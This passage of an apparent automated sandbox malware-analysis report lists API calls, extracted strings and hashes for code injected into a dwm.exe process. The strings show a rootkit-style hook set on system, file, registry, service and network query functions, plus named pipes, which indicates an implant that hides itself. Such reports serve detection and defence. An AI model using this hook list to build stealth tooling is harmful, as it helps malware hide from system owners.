                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA917AA
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA917CA
                                                                          • Sleep.KERNEL32 ref: 000001160CA91AD7
                                                                          • SleepEx.KERNEL32 ref: 000001160CA91ADD
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA917E5
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA91805
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA91820
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA91840
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA9185B
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA9187B
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA91896
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA918A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: 9881012fa553c27446f3d689fbb38d33500f0266a2bf9d8669fbc936a1160e45
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: E531DF7120074641FF5DAB26DA423ED63A5EB8DBC4F0459A1BF09876AEFE27C8D1C211

                                                                          Control-flow Graph

                                                                          control_flow_graph (rendered graph, executed/not-executed colouring and edge list omitted): function starting at 1160ca92b2c; basic blocks 1160ca92b2c-1160ca92f03; calls GetModuleHandleA, StrCmpNIW and lstrlenW
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: ba0cfe49bb5a227ef72f8b779e404880ff7a11271dfa9d0e2275a6e4cd538248
                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: 04B16972211B9096EB6C8F25D4827E967A5FB49B84F445296FF09937A8EB37CCC0C740
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: 3f34dc0b64f25b586abfce6f138ac04a50128005e3cc8ae63f7b2b4d37e676ef
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: 77316272215B808AEB649F60E8417ED7374F788744F44446AEF4D97B98EF3AC688CB10
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: 55553a78a1b27a825a8efe9be9c969825aa231a8d9ea9b2d7f20ec6e85906b0d
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: 12315B32614B8086EB648F25E8413EE73A4F789758F540166FF9D43BA8DF3AC586CB00

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: 162b9db3af3e4f0b3a78029389c8c0e2efeab852aa306eb9b8286a8110c41f8a
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 13512A76200B8586EB58CF62E5483DAB7A1F7CDB99F484124EF4A07758DF3AC0858B00

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 9c8e68ec56521c736e69b0c90525e1edec2e7508071d60ba112b0ced23c1d8aa
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: DE317178500B4AA0EA0DEB65E8527D86360F78D344FC05693BF4A5296EDF3B86C9C350

                                                                          Control-flow Graph

                                                                          control_flow_graph (rendered graph, executed/not-executed colouring and edge list omitted): function starting at 1160ca66910; basic blocks 1160ca66910-1160ca66c2c; calls __scrt_dllmain_crt_thread_attach and __scrt_dllmain_after_initialize_c
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: a3fe409731fb70234742a26c748ae4f8614f4a10b95ebe228a936564dbb7576c
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 2981DC31710B458AFB5CAB6D98413D963A0EB9DB84F5485A5BF098379EDB3BC8C98700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 000001160CA9CE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CEBC
                                                                          • SetLastError.KERNEL32 ref: 000001160CA9CED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,000001160CA9ECCC,?,?,?,?,000001160CA9BF9F,?,?,?,?,?,000001160CA97AB0), ref: 000001160CA9CF2C
                                                                            • Part of subcall function 000001160CA9D6CC: HeapAlloc.KERNEL32 ref: 000001160CA9D721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CF54
                                                                            • Part of subcall function 000001160CA9D744: HeapFree.KERNEL32 ref: 000001160CA9D75A
                                                                            • Part of subcall function 000001160CA9D744: GetLastError.KERNEL32 ref: 000001160CA9D764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CAA0A6B,?,?,?,000001160CAA045C,?,?,?,000001160CA9C84F), ref: 000001160CA9CF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: e3b464467abdfc7ef8d6bea1e9688bc0b2781f6fd73f9701bdfe4f8e4c242dd3
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: D2414F30201B8446FA6CA77559573F92292DB8C7B8F6807A4BF37466EFDE2B94C19600
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: e292498a95fe2d6169a81c521cacf55811437730a08cb21fdc389e806cb806c0
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: A4213876614B4092FB188B26E4483DA67A0F789BA4F544255FF9903BA8CF7EC189CF00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: 2ba54f05254bae68ad0188527a48383a5b7b71df85ea8c7c10141abdec57d0dc
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: 61E16872604B848AEB689F79D4803DE77A4F799B98F100155FF8957B9ACB3AC4D1C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: 14005bb12589e4233e0fab4aea04c1dde444902fadaf24d390ce92b9d7b9fed6
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: E9E17B72604B808AEB68DF65D4823DE77A4F789B98F10415AFF8957B99CB36C8C1D700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001160CA9C7DE,?,?,?,?,?,?,?,?,000001160CA9CF9D,?,?,00000001), ref: 000001160CA9D087
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA9C7DE,?,?,?,?,?,?,?,?,000001160CA9CF9D,?,?,00000001), ref: 000001160CA9D0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA9C7DE,?,?,?,?,?,?,?,?,000001160CA9CF9D,?,?,00000001), ref: 000001160CA9D0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA9C7DE,?,?,?,?,?,?,?,?,000001160CA9CF9D,?,?,00000001), ref: 000001160CA9D0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA9C7DE,?,?,?,?,?,?,?,?,000001160CA9CF9D,?,?,00000001), ref: 000001160CA9D0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: a54b180e1825f259867276b75912e54126220ed59de397486db85666662ac1cb
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: EB617A33600B888AEB28DFA5D4813DD77B0F348B88F044256EF4A17B98DB3AD995C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 0d3f649f3e214bf1ad3b67a947e903f0fb44eb02b02186e1919c71ddb1229bee
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 36518236100B80CAEB788F2995443D977A0F359B98F184255FF99A7BD9CB3AD8D1D700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 7e1fb8fdabdebb0689bf3c3404f30a21e962d6697f5bd71d6188b06412b45dbd
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 1E518D721007808AEB688F2595863D977A0F359B85F185156FF9A47BD9CB3BD8D0D700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: 511292130ba11b18e6ec435e9b9489d8c9b6dd49d0b852a9a64ee7ca7a2fa1f3
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: E751AB72602B008AEB19CB29E444BD93799F358B98F5581A5EF16437CCEB7AC8C18704
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 5074665d853f127c4aa43890f70cda479e0123e79606554beef683be19da4394
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: C3316972601B4096EB18DF2AE848BD977A8F348B98F158154FF6A0778CDB3EC980C704
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction ID: 4a6be51de3848e6702e713832d9233cbb7be7e1cc48ffc979ff010895bd085d9
                                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction Fuzzy Hash: 02D1BD72714B808AE719CFA9D4403EC3BB1E398798F148256EF5E97B99DB36C496C340
                                                                          APIs
                                                                          Memory Dump Source
